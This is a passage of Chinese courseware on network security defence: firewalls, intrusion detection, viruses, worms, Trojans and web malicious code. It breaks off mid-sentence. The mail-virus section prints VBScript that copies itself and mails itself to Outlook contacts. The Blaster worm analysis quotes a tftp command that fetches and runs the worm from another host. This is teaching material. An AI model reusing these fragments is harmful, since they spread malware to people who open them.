網(wǎng)絡(luò)安全技術(shù)第六章-網(wǎng)絡(luò)安全防護(hù)技術(shù)課件

1、第6章 網(wǎng)絡(luò)安全防護(hù)技術(shù)網(wǎng)絡(luò)安全防護(hù)技術(shù)是指為防止網(wǎng)絡(luò)通信阻塞、中斷、癱瘓或被非法控制等以及網(wǎng)絡(luò)中傳輸、存儲(chǔ)、處理的數(shù)據(jù)信息丟失、泄露或被非法篡改等所需要的相關(guān)技術(shù)。本章主要針對常見的網(wǎng)絡(luò)攻擊手段、入侵機(jī)制，討論一些針對性較強(qiáng)的網(wǎng)絡(luò)安全防護(hù)技術(shù)，如防火墻、入侵檢測及惡意代碼防范與響應(yīng)等。雖然這些技術(shù)對防御具體的入侵機(jī)制很有效，但畢竟合法系統(tǒng)難以預(yù)測攻擊者究竟會(huì)以什么樣的機(jī)制實(shí)施入侵，攻擊者也肯定不會(huì)總遵循固定的規(guī)則實(shí)施攻擊，因此需要更具有普遍性的解決方案，進(jìn)而引入了對入侵檢測系統(tǒng)、網(wǎng)絡(luò)攻擊取證與安全審計(jì)等方面的討論。第6章 網(wǎng)絡(luò)安全防護(hù)技術(shù)6.1 防火墻技術(shù)6.1.1 防火墻概述6.1.2 防

2、火墻技術(shù)原理6.1.3 防火墻的體系結(jié)構(gòu)6.1.4 防火墻的部署應(yīng)用實(shí)例6.1.5 典型硬件防火墻的配置6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)6.2.2 入侵檢測系統(tǒng)的分析技術(shù)6.2.3 入侵檢測系統(tǒng)的設(shè)置與部署6.2.4 典型入侵檢測系統(tǒng)應(yīng)用實(shí)例6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.1 何謂惡意代碼與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范6.3.3 網(wǎng)絡(luò)蠕蟲6.3.4 特洛伊木馬6.3.5 網(wǎng)頁惡意代碼6.3.6 僵尸網(wǎng)絡(luò)6.4 網(wǎng)絡(luò)攻擊取證與安全審計(jì)6.4.1 計(jì)算機(jī)取證技術(shù)6.4.2 網(wǎng)絡(luò)安全審計(jì)6.1 防火墻技術(shù)6.1.1防火墻概述防火墻是一種綜合性較強(qiáng)的網(wǎng)絡(luò)防護(hù)工具，涉及到計(jì)

3、算機(jī)網(wǎng)絡(luò)技術(shù)、密碼技術(shù)、軟件技術(shù)、安全協(xié)議、安全標(biāo)準(zhǔn)、安全操作系統(tǒng)等多方個(gè)面。它通常是一種軟件和硬件的組合體，用于網(wǎng)絡(luò)間的訪問控制，防止外部非法用戶使用內(nèi)部網(wǎng)絡(luò)資源，保護(hù)內(nèi)部網(wǎng)絡(luò)的設(shè)備不被破壞，防止內(nèi)部網(wǎng)絡(luò)的敏感數(shù)據(jù)被竊取。防火墻具有過濾進(jìn)出網(wǎng)絡(luò)的數(shù)據(jù)、管理進(jìn)出網(wǎng)絡(luò)的訪問行為、禁止非法訪問等基本功能。6.1 防火墻技術(shù)6.1.1防火墻概述1.防火墻的基本概念所謂防火墻是指設(shè)置在不同網(wǎng)絡(luò)或網(wǎng)絡(luò)安全域之間的一系列部件的組合。它是不同網(wǎng)絡(luò)或網(wǎng)絡(luò)安全域之間信息的唯一出入口，能根據(jù)部門的安全策略控制（允許、拒絕、監(jiān)測）出入網(wǎng)絡(luò)的數(shù)據(jù)流，且本身具有較強(qiáng)的抗攻擊能力。在物理組成上，防火墻系統(tǒng)可以是路由器，也

4、可以是個(gè)人計(jì)算機(jī)、主機(jī)系統(tǒng)，或一批向網(wǎng)絡(luò)提供安全保障的軟硬件系統(tǒng)。在邏輯上，防火墻是一個(gè)分離器、一個(gè)限制器，也可以是一個(gè)分析器。6.1 防火墻技術(shù)6.1.1防火墻概述1.防火墻的基本概念圖6-1 防火墻邏輯示意圖6.1 防火墻技術(shù)6.1.1防火墻概述2防火墻的主要功能1）通過防火墻可以定義一個(gè)阻塞點(diǎn)(控制點(diǎn))，過濾進(jìn)、出網(wǎng)絡(luò)的數(shù)據(jù)，管理進(jìn)、出網(wǎng)絡(luò)的訪問行為，過濾掉不安全服務(wù)和非法用戶，以防止外來入侵。2）控制對特殊站點(diǎn)的訪問，例如可以配置相應(yīng)的WWW和FTP服務(wù)，使互聯(lián)網(wǎng)用戶僅可以訪問此類服務(wù)，而禁止對其它系統(tǒng)的訪問。3）記錄內(nèi)外通信的有關(guān)狀態(tài)信息日志，監(jiān)控網(wǎng)絡(luò)安全并在異常情況下給出告警。4）

5、可用作IPSec的平臺(tái)，如可以用來實(shí)現(xiàn)虛擬專用網(wǎng)（VPN）。6.1 防火墻技術(shù)6.1.1防火墻概述3.防火墻的實(shí)現(xiàn)原則防火墻是一個(gè)矛盾統(tǒng)一體，它既要限制數(shù)據(jù)的流通，又要保持?jǐn)?shù)據(jù)的流通。實(shí)現(xiàn)防火墻時(shí)可遵循兩項(xiàng)基本原則：1）一切未被允許的都是禁止的。根據(jù)這一原則，防火墻應(yīng)封鎖所有數(shù)據(jù)流，然后對希望提供的服務(wù)逐項(xiàng)開放。這種方法很安全，因?yàn)楸辉试S的服務(wù)都是仔細(xì)挑選的；但限制了用戶使用的便利性，用戶不能隨心所欲地使用網(wǎng)絡(luò)服務(wù)。2）一切未被禁止的都是允許的。根據(jù)這一原則，防火墻應(yīng)轉(zhuǎn)發(fā)所有數(shù)據(jù)流，然后逐項(xiàng)屏蔽可能有害的服務(wù)。這種方法較靈活，可為用戶提供更多的服務(wù)，但安全性差一些。由于這兩種防火墻實(shí)現(xiàn)原則在安

6、全性和可使用性上各有側(cè)重，實(shí)際中，很多防火墻系統(tǒng)在兩者之間做一定的折衷。6.1 防火墻技術(shù)6.1.1防火墻概述4.防火墻的主要類型（1）包過濾防火墻（2）應(yīng)用代理防火墻（3）電路層防火墻（4）狀態(tài)檢測防火墻6.1 防火墻技術(shù)6.1.2 防火墻技術(shù)原理自采用包過濾技術(shù)的第一代防火墻到現(xiàn)在，防火墻技術(shù)經(jīng)歷了包過濾、應(yīng)用代理、狀態(tài)檢測及深度檢測技術(shù)等發(fā)展階段，目前，已有多種防火墻技術(shù)可供網(wǎng)絡(luò)安全管理員選擇使用。1.包過濾技術(shù)簡單的說，包過濾(Packet Filtering)就是在網(wǎng)絡(luò)層，依據(jù)系統(tǒng)事先設(shè)定的過濾規(guī)則，檢查數(shù)據(jù)流中的每個(gè)包，根據(jù)包頭信息來確定是否允許數(shù)據(jù)包通過。6.1 防火墻技術(shù)6.1

7、.2 防火墻技術(shù)原理1.包過濾技術(shù)圖 6-2 包過濾工作原理6.1 防火墻技術(shù)6.1.2 防火墻技術(shù)原理2.代理服務(wù)器技術(shù)所謂代理服務(wù)器是指代表內(nèi)網(wǎng)向外網(wǎng)服務(wù)器進(jìn)行連接請求的服務(wù)程序，其基本工作原理是：代理服務(wù)器監(jiān)聽網(wǎng)絡(luò)內(nèi)部客戶機(jī)的服務(wù)請求，當(dāng)一個(gè)連接到來時(shí)，首先進(jìn)行身份和授權(quán)訪問等級(jí)認(rèn)證，并根據(jù)安全策略決定是否中轉(zhuǎn)。當(dāng)請求符合安全策略時(shí)，代理服務(wù)器上的客戶機(jī)進(jìn)程代表這個(gè)請求向真正的服務(wù)器發(fā)出請求，然后將服務(wù)器的響應(yīng)數(shù)據(jù)轉(zhuǎn)發(fā)給內(nèi)部客戶機(jī)。6.1 防火墻技術(shù)6.1.2 防火墻技術(shù)原理3.狀態(tài)檢測技術(shù)其關(guān)鍵是在防火墻的核心部分建立狀態(tài)連接表，并將進(jìn)出網(wǎng)絡(luò)的數(shù)據(jù)包當(dāng)成一個(gè)一個(gè)的會(huì)話，利用狀態(tài)連接表跟

8、蹤每一個(gè)會(huì)話狀態(tài)。狀態(tài)檢測防火墻不僅根據(jù)規(guī)則表對每一個(gè)數(shù)據(jù)包進(jìn)行檢查，而且還考慮數(shù)據(jù)包是否符合會(huì)話所處的狀態(tài)，通過對高層的信息進(jìn)行某種形式的邏輯或數(shù)學(xué)運(yùn)算，提供對傳輸層的控制。6.1 防火墻技術(shù)6.1.2 防火墻技術(shù)原理3.狀態(tài)檢測技術(shù)如表6-3所列，每個(gè)當(dāng)前建立的連接都記錄在狀態(tài)連接表里，如果一個(gè)數(shù)據(jù)包的源端口是系統(tǒng)內(nèi)部的一個(gè)介于1024和16383之間的端口，而且它的信息與狀態(tài)連接表里的某一條記錄相符，包過濾器才允許它進(jìn)入。源地址源端口目的地址目的端口連接狀態(tài)011030980已建立0210312380已建立06103325已建立9335679已建立223.256.18.23102580已

9、建立表6-3 狀態(tài)檢測防火墻的狀態(tài)連接表示例6.1 防火墻技術(shù)6.1.3 防火墻的體系結(jié)構(gòu)目前，防火墻的體系結(jié)構(gòu)有雙重宿主主機(jī)體系結(jié)構(gòu)、屏蔽主機(jī)體系結(jié)構(gòu)、屏蔽子網(wǎng)體系結(jié)構(gòu)，以及新型混合防火墻體系結(jié)構(gòu)等類型。1.雙重宿主主機(jī)體系結(jié)構(gòu)6.1 防火墻技術(shù)6.1.3 防火墻的體系結(jié)構(gòu)2.屏蔽主機(jī)體系結(jié)構(gòu)圖6-8 屏蔽主機(jī)防火墻體系結(jié)構(gòu)6.1 防火墻技術(shù)6.1.3 防火墻的體系結(jié)構(gòu)3.屏蔽子網(wǎng)體系結(jié)構(gòu)圖6-9 屏蔽子網(wǎng)防火墻體系結(jié)構(gòu)6.1 防火墻技術(shù)6.1.4 防火墻的部署應(yīng)用實(shí)例1區(qū)域分割的層疊方式圖6-10 防火墻系統(tǒng)的層疊方式6.1 防火墻技術(shù)6.1.4 防火墻的部署應(yīng)用實(shí)例2.區(qū)域分割的三角方式

10、圖6-11 以區(qū)域分割的三角方式部署防火墻6.1 防火墻技術(shù)6.1.4 防火墻的部署應(yīng)用實(shí)例3.防火墻存在的缺陷1）防火墻不能防御不經(jīng)過防火墻的攻擊。2）防火墻不能防止感染了病毒的軟件或文件的傳輸。這只能在每臺(tái)主機(jī)上裝反病毒軟件。3）防火墻只能用來防御已知的威脅，不能防御全部的威脅。4）防火墻不能防御惡意的內(nèi)部用戶。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)入侵是指未經(jīng)授權(quán)蓄意嘗試訪問、篡改數(shù)據(jù)，使網(wǎng)絡(luò)系統(tǒng)不可使用的行為。入侵檢測（Intrusion Detection），顧名思義便是對入侵行為的發(fā)覺,即在計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)中的若干關(guān)鍵點(diǎn)搜集信息，通過對所收集信息的分析發(fā)現(xiàn)網(wǎng)絡(luò)系統(tǒng)中是否有違

11、反安全策略的行為和遭到攻擊的跡象。入侵檢測的目的主要是：識(shí)別入侵者；識(shí)別入侵行為；檢測和監(jiān)視以實(shí)施的入侵行為；為對抗入侵提供信息，阻止入侵的發(fā)生和事態(tài)的擴(kuò)大。進(jìn)行入侵檢測的軟件、硬件組合便是入侵檢測系統(tǒng)。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)1入侵檢測系統(tǒng)的基本結(jié)構(gòu)圖6-12 入侵檢測系統(tǒng)的基本結(jié)構(gòu)6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)2.入侵檢測系統(tǒng)的主要功能入侵檢測系統(tǒng)作為一種積極主動(dòng)的安全防護(hù)工具，提供了對內(nèi)部攻擊、外部攻擊和誤操作的實(shí)時(shí)防護(hù)，在網(wǎng)絡(luò)系統(tǒng)受到危害之前進(jìn)行報(bào)警、攔截和響應(yīng)。一般說來，IDS應(yīng)具有的功能為：監(jiān)控、分析用戶和系統(tǒng)的活動(dòng)；核查系統(tǒng)配置和漏洞；評

12、估關(guān)鍵系統(tǒng)和數(shù)據(jù)文件的完整性；對異常行為統(tǒng)計(jì)分析，識(shí)別攻擊的活動(dòng)模式并報(bào)警；對操作系統(tǒng)進(jìn)行審計(jì)、跟蹤管理。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)3.入侵檢測的過程(1)信息收集入侵檢測的第一步是信息收集，收集的內(nèi)容包括系統(tǒng)、網(wǎng)絡(luò)、數(shù)據(jù)及用戶活動(dòng)的狀態(tài)和行為。（2)數(shù)據(jù)分析對收集到的數(shù)據(jù)進(jìn)行分析是入侵檢測系統(tǒng)的核心工作。按照數(shù)據(jù)分析的方式，一般有三種手段：模式匹配。統(tǒng)計(jì)分析。完整性分析。（3)結(jié)果處理通過數(shù)據(jù)分析發(fā)現(xiàn)了入侵跡象時(shí)，入侵檢測系統(tǒng)把分析結(jié)果記錄在日志文件中，并產(chǎn)生一個(gè)告警報(bào)告，同時(shí)還要觸發(fā)警報(bào)到控制臺(tái)。6.2 入侵檢測系統(tǒng)6.2.1 何謂入侵檢測系統(tǒng)4入侵檢測系統(tǒng)的分類（1

13、）按照入侵檢測的體系結(jié)構(gòu)劃分基于主機(jī)的入侵檢測系統(tǒng)、基于網(wǎng)絡(luò)的入侵檢測系統(tǒng)和分布式入侵檢測系統(tǒng)。（2）按照入侵檢測的時(shí)間分類實(shí)時(shí)入侵檢測系統(tǒng)和事后入侵檢測系統(tǒng)兩種類型。6.2 入侵檢測系統(tǒng)6.2.2 入侵檢測系統(tǒng)的分析技術(shù)1.異常入侵檢測技術(shù)（1）基于統(tǒng)計(jì)學(xué)方法的異常分析（2）基于計(jì)算機(jī)免疫技術(shù)的異常檢測方法（3）基于數(shù)據(jù)挖掘的異常檢測方法2.特征分析檢測技術(shù)（1）模式匹配（2）專家系統(tǒng)6.2 入侵檢測系統(tǒng)6.2.3 入侵檢測系統(tǒng)的設(shè)置與部署1.網(wǎng)絡(luò)入侵檢測系統(tǒng)的設(shè)置步驟6.2 入侵檢測系統(tǒng)6.2.3 入侵檢測系統(tǒng)的設(shè)置與部署2.入侵檢測系統(tǒng)部署（1）基于網(wǎng)絡(luò)入侵檢測系統(tǒng)的部署一般說來，可以將

14、入侵檢測系統(tǒng)的部署點(diǎn)劃分為外網(wǎng)入口、DMZ區(qū)、內(nèi)網(wǎng)主干和關(guān)鍵子網(wǎng)4個(gè)部署點(diǎn)，如圖6-14所示是一個(gè)部署入侵檢測系統(tǒng)的典型方案。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.1 何謂惡意代碼與應(yīng)急響應(yīng)何謂惡意代碼？它們從哪里來？是如何傳播的？應(yīng)該如何防止？如果已經(jīng)被惡意代碼侵害，又應(yīng)該如何處理？這些都是惡意代碼防范與應(yīng)急響應(yīng)所要討論的重要內(nèi)容。1.惡意代碼的含義所謂惡意代碼（Malicious Code）實(shí)質(zhì)上是指一種在一定環(huán)境下可以獨(dú)立執(zhí)行的計(jì)算機(jī)程序或者嵌入到其它程序中的代碼，也稱之為惡意軟件（Malicious Software）。惡意代碼能在不被用戶察覺的情況下啟動(dòng)運(yùn)行，破壞計(jì)算機(jī)系統(tǒng)的安全性和

15、完整性。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.1 何謂惡意代碼與應(yīng)急響應(yīng)1.惡意代碼的含義（1）惡意代碼的分類1）不感染的依附性惡意代碼。這類惡意代碼主要有木馬（Trojan）、邏輯炸彈(Logic Bomb)及后門(Back Door)或者陷門（Trap Door）等。2）不感染的獨(dú)立性惡意代碼。這類惡意代碼主要有點(diǎn)滴器（Dropper）、繁殖器(Generator)、惡作?。℉oax）等。3）可感染的依附性惡意代碼。這類惡意代碼主要是指一段依附在其它程序上、可以進(jìn)行自我繁殖的計(jì)算機(jī)病毒。4)可感染的獨(dú)立性惡意代碼。這類惡意代碼主要有蠕蟲（Worm）、網(wǎng)頁惡意代碼、計(jì)算機(jī)細(xì)菌(Germ)及僵

16、尸網(wǎng)絡(luò)等。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.1 何謂惡意代碼與應(yīng)急響應(yīng)1.惡意代碼的含義（2）惡意代碼的傳播一般情況下，惡意代碼有三種傳播途徑：一是利用操作系統(tǒng)漏洞或者軟件漏洞傳播；二是通過瀏覽器傳播；三是利用用戶的信任關(guān)系傳播。 6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.1 何謂惡意代碼與應(yīng)急響應(yīng)2.什么是應(yīng)急響應(yīng)所謂應(yīng)急響應(yīng)(Incident Response或Emergency Response)通常指一個(gè)組織為了應(yīng)對各種突發(fā)事件的發(fā)生所做的準(zhǔn)備，以及在突發(fā)事件發(fā)生后所采取的措施和行動(dòng)。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范1.網(wǎng)絡(luò)病毒的概念（1）計(jì)算機(jī)病毒的定義從廣

17、義上講，凡能夠引起計(jì)算機(jī)系統(tǒng)故障，破壞計(jì)算機(jī)數(shù)據(jù)的程序統(tǒng)稱為計(jì)算機(jī)病毒。簡言之，計(jì)算機(jī)病毒就是一種惡意代碼，即可感染的依附性惡意代碼。它隱藏在計(jì)算機(jī)系統(tǒng)資源中，能影響系統(tǒng)正常運(yùn)行，并通過系統(tǒng)資源共享等途徑進(jìn)行傳播。計(jì)算機(jī)病毒一般由三部分組成：主控程序負(fù)責(zé)病毒程序的組裝和初始化工作；傳染程序?qū)⒉《境绦騻魅镜狡渌目蓤?zhí)行程序上去；破壞程序?qū)崿F(xiàn)病毒程序編制者的破壞意圖。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范1.網(wǎng)絡(luò)病毒的概念（2）網(wǎng)絡(luò)病毒的含義若按病毒傳播方式劃分，可以將其分為單機(jī)病毒和網(wǎng)絡(luò)病毒兩類。所謂網(wǎng)絡(luò)病毒是指，通過網(wǎng)絡(luò)通信機(jī)制，引起計(jì)算機(jī)系統(tǒng)、網(wǎng)絡(luò)系統(tǒng)故障，破壞網(wǎng)絡(luò)通信及

18、數(shù)據(jù)的惡意代碼。網(wǎng)絡(luò)病毒除具有計(jì)算機(jī)病毒的一般特性之外，還呈現(xiàn)出如下一些新的特點(diǎn)。1）傳染速度快。2）清除難度大。3）破壞性強(qiáng)。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范2.計(jì)算機(jī)病毒的結(jié)構(gòu)及工作機(jī)制（1）計(jì)算機(jī)病毒的結(jié)構(gòu)計(jì)算機(jī)病毒的基本特征是引導(dǎo)、觸發(fā)、傳染和破壞，因此一個(gè)計(jì)算機(jī)病毒一般由引導(dǎo)模塊、觸發(fā)模塊、傳染模塊和破壞模塊組成。圖6-16 計(jì)算機(jī)病毒工作機(jī)制示意圖6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范3.典型郵件病毒代碼分析通過Outlook傳播的病毒基本上用VBScript語言編寫而成，其自我復(fù)制原理也是利用程序本身的腳本內(nèi)容復(fù)制一份到一個(gè)臨時(shí)文件，

19、然后再在傳播環(huán)節(jié)將其作為附件發(fā)送出去。例如，使用如下兩行代碼就可以將自身復(fù)制到C盤根目錄下的temp.vbs文件中。Set fso=CreateObject(“Scripting.FileSystemObject”)Fso.GetFile(WScript.ScriptFullName).Copy(“C:temp.vbs”)其中，第一行創(chuàng)建一個(gè)文件系統(tǒng)對象。第二行前面是打開這個(gè)腳本文件，WScript.ScriptFullName用于指明是這個(gè)程序本身，即一個(gè)完整的路徑文件名；用GetFile函數(shù)獲得這個(gè)文件；使用Copy函數(shù)將這個(gè)文件復(fù)制到C盤根目錄下的temp.vbs文件中。6.3 惡意代碼

20、防范與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范3.典型郵件病毒代碼分析如下的代碼段可實(shí)現(xiàn)郵件病毒的傳播：Set ola=CreateObject(“Outlook.Application”)On Error Resume Nextfor i=1 to 60Set Mail=ola.CreateItem(0)Mail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x)Mail.Subject=“Betreffder E-Mail”Mail.Body=“Textder E-Mail”Mail.Attachments.Add(“C:

21、temp.vbs”)Mail.SendOla.Quit6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.2 網(wǎng)絡(luò)病毒及其防范4.病毒的防范措施1）從管理上，建立嚴(yán)格的計(jì)算機(jī)使用、管理制度，執(zhí)行有效的應(yīng)用和操作規(guī)范；對外來軟件和存儲(chǔ)介質(zhì)進(jìn)行病毒檢查，嚴(yán)禁使用來歷不明的軟件；保護(hù)好隨機(jī)攜帶的原始資料和軟件版本，建立安全的資料備份制度；對計(jì)算機(jī)定期進(jìn)行病毒檢測，一旦發(fā)現(xiàn)病毒立即隔離，防止擴(kuò)散，并報(bào)告主管部門；購買計(jì)算機(jī)時(shí)，必須考慮對計(jì)算機(jī)病毒的防范。2）從技術(shù)上，配備病毒檢測程序，及時(shí)發(fā)現(xiàn)并消除病毒；制訂病毒侵入應(yīng)急技術(shù)措施，減少病毒造成的損失；嚴(yán)格保護(hù)硬盤，設(shè)置禁寫保護(hù)，防止非法裝載硬盤；采取加密手段，防止病

22、毒入侵；研制“病毒疫苗”程序，增強(qiáng)程序的防病毒能力；創(chuàng)建安全操作系統(tǒng)，防止病毒破壞。3）在法律上，制訂相應(yīng)法規(guī)，對制造、施放和出售病毒的行為，給予嚴(yán)懲。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲1.蠕蟲病毒蠕蟲(Worm)，從廣義上來講一般認(rèn)為是一種通過網(wǎng)絡(luò)傳播的惡性病毒，但蠕蟲病毒與一般病毒有很大區(qū)別，蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性病毒，具有病毒的一些共性，如傳播性、隱蔽性、破壞性等；同時(shí)又有自己的一些特征，如不利用文件寄生(只存在于內(nèi)存中)，對網(wǎng)絡(luò)造成拒絕服務(wù)等。按照攻擊對象不同，可以將蠕蟲病毒分為兩類：一類是面向企業(yè)用戶和局域網(wǎng)的蠕蟲，主要利用系統(tǒng)漏洞主動(dòng)進(jìn)行攻擊破壞。這類蠕蟲病毒

23、以“紅色代碼”、“尼姆達(dá)”以及“SQL蠕蟲王”等為代表。另一類是針對個(gè)人用戶的蠕蟲，通過網(wǎng)絡(luò)（主要是電子郵件、惡意網(wǎng)頁等形式）進(jìn)行傳播。這類蠕蟲病毒以“愛蟲”、“求職信”等病毒為代表。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲1.蠕蟲病毒蠕蟲的工作過程一般為：掃描：蠕蟲開始隨機(jī)選取某一段IP地址，然后對這一IP地址段上的主機(jī)進(jìn)行掃描，探測存在漏洞的主機(jī)。有時(shí)可能會(huì)不斷重復(fù)這一掃描過程。這樣，隨著蠕蟲的傳播，新感染的主機(jī)也開始進(jìn)行這種掃描。網(wǎng)絡(luò)上的掃描包就越多。攻擊：當(dāng)蠕蟲掃描到網(wǎng)絡(luò)中存在漏洞的主機(jī)后，就開始利用自身的破壞功能獲取主機(jī)的管理員權(quán)限。利用原主機(jī)與新主機(jī)的交互，將蠕蟲程序復(fù)制

24、到新主機(jī)并啟動(dòng)。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲2.蠕蟲程序的功能結(jié)構(gòu)和傳播流程圖6-17 蠕蟲程序的功能結(jié)構(gòu)模型6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲2.蠕蟲程序的功能結(jié)構(gòu)和傳播流程圖6-18 蠕蟲程序傳播流程6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲3.典型蠕蟲病毒實(shí)例分析沖擊波蠕蟲病毒執(zhí)行流程如下:1)病毒運(yùn)行時(shí)首先在內(nèi)存中建立一個(gè)名為:“msblast.exe”的進(jìn)程，該進(jìn)程就是活的病毒體。病毒還會(huì)修改注冊表，在“HKEY_LOCAL_MACH INESOFTWAREMicrosoftWindowsCurrentVersion Run”中添加鍵值:

25、“windows autoupdate = msblast.exe”，這樣在每次啟動(dòng)系統(tǒng)時(shí)，病毒就會(huì)自動(dòng)運(yùn)行。2)判斷BILLY互斥體，如果已經(jīng)感染，蠕蟲退出。3)以20秒為間隔，檢測一次網(wǎng)絡(luò)連接狀態(tài)。若未連入網(wǎng)絡(luò)，永遠(yuǎn)循環(huán)。4)判斷日期大于15號(hào)、月份大于8，蠕蟲啟動(dòng)syn flood攻擊某網(wǎng)站更新站點(diǎn)，例如的Web服務(wù)端口80。5)首先感染子網(wǎng)IP地址，然后隨機(jī)感染外網(wǎng)IP地址。6)感染其它主機(jī)，若緩沖區(qū)溢出成功，遠(yuǎn)程主機(jī)會(huì)在4444端口監(jiān)聽，提供cmd shell服務(wù)；然后本地開啟tftp(69端口)服務(wù)，接著利用連接4444端口socket發(fā)送命令tftp - i ip GET msb

26、last.exe，最后執(zhí)行g(shù)et后的程序。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲4.網(wǎng)絡(luò)蠕蟲的防范措施(1)修補(bǔ)系統(tǒng)漏洞(2)刪除蠕蟲要利用的程序(5)接種疫苗(4)采用入侵檢測技術(shù)(3)配置合適的網(wǎng)絡(luò)防火墻6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.3 網(wǎng)絡(luò)蠕蟲5.網(wǎng)絡(luò)蠕蟲的清除方法(1)用殺毒軟件查殺(2)手工清除先撥掉網(wǎng)線，啟動(dòng)任務(wù)管理器，在其中查找msblast.exe進(jìn)程，找到后在進(jìn)程上單擊右鍵，選擇結(jié)束進(jìn)程。用文件搜索的方法查找到Msblast.exe后刪除。修改注冊表，點(diǎn)開始菜單中的運(yùn)行，輸入regedit后點(diǎn)確定運(yùn)行注冊表編輯器，找到“HKEY_LOCAL_MACH IN

27、ESoftwareMicrosoftWindowsCurrentVersionRun”后，在右邊找到鍵值“windows autoupdate=msblast.exe”，將其刪除。重啟計(jì)算機(jī)并打上補(bǔ)丁，以免計(jì)算機(jī)再次遭受蠕蟲攻擊。連接網(wǎng)線，恢復(fù)正常工作。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.4 特洛伊木馬1.木馬的含義簡單地講，木馬是一種帶有惡意性質(zhì)的遠(yuǎn)程控制軟件。一般的木馬包括一個(gè)服務(wù)器程序和一個(gè)客戶機(jī)程序。服務(wù)器程序負(fù)責(zé)打開攻擊的通道，放置在被入侵的計(jì)算機(jī)中，就像一個(gè)內(nèi)奸特務(wù)。通常所說的木馬程序即是服務(wù)器程序?？蛻魴C(jī)程序放在木馬控制者的計(jì)算機(jī)中，負(fù)責(zé)攻擊目標(biāo)主機(jī)。6.3 惡意代碼防范與應(yīng)急

28、響應(yīng)6.3.4 特洛伊木馬2.木馬系統(tǒng)的關(guān)鍵技術(shù)（1）遠(yuǎn)程啟動(dòng)技術(shù)1）注冊表啟動(dòng)。2）Windows系統(tǒng)服務(wù)。3）系統(tǒng)配置文件。4）修改文件關(guān)聯(lián)。（2）自動(dòng)隱藏技術(shù)1）進(jìn)程插入。2）核心態(tài)隱藏。3）隱蔽通信技術(shù)。4）反彈式木馬技術(shù)。（3）自動(dòng)加載技術(shù)（4）輸入設(shè)備控制（5）遠(yuǎn)程文件管理6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.4 特洛伊木馬3木馬自動(dòng)加載程序代碼示例 6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.4 特洛伊木馬4.木馬病毒的檢測（1）檢查網(wǎng)絡(luò)通信流量（2）查看進(jìn)程與網(wǎng)絡(luò)連接（3）檢查啟動(dòng)項(xiàng)（4）檢查系統(tǒng)賬戶（5）查看進(jìn)程加載的服務(wù)（6）使用病毒檢測軟件查殺木馬6.3 惡意代碼防范與應(yīng)急響應(yīng)

29、6.3.5 網(wǎng)頁惡意代碼網(wǎng)頁惡意代碼又稱為網(wǎng)頁病毒，主要指某些網(wǎng)站使用的惡意代碼。它用腳本語言來實(shí)現(xiàn)相關(guān)功能，利用軟件和操作系統(tǒng)安全漏洞通過網(wǎng)頁進(jìn)行傳播。網(wǎng)頁惡意代碼依賴于腳本引擎解釋執(zhí)行。1.網(wǎng)頁惡意代碼的特點(diǎn)及安全威脅網(wǎng)頁惡意代碼的常見危害形式有：1）更改主頁設(shè)置；2）隱藏“開始”菜單的命令；3）隱藏“我的電腦”中的硬盤；3）隱藏桌面圖標(biāo)；4）禁用DOS程序；5）修改登錄窗口；6）修改IE瀏覽器的標(biāo)題，即修改瀏覽器最上方的藍(lán)色標(biāo)題欄中的文字，在上面加入廣告或宣傳文字。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.5 網(wǎng)頁惡意代碼2.網(wǎng)頁惡意代碼的類型1）基于JavaScript的腳本病毒。2）基于

30、VBScript的腳本病毒。3）基于PHP的腳本病毒。4）腳本語言與木馬結(jié)合的病毒。6.3 惡意代碼防范與應(yīng)急響應(yīng)6.3.5 網(wǎng)頁惡意代碼4.網(wǎng)頁惡意代碼的防范與清除1）不要輕易瀏覽一些來歷不明的網(wǎng)站，特別是有不良內(nèi)容的網(wǎng)站。2）如果系統(tǒng)己經(jīng)遭到網(wǎng)頁惡意代碼的攻擊，可采用手工修改注冊表相關(guān)鍵值的方法恢復(fù)系統(tǒng)。3）修改Windows 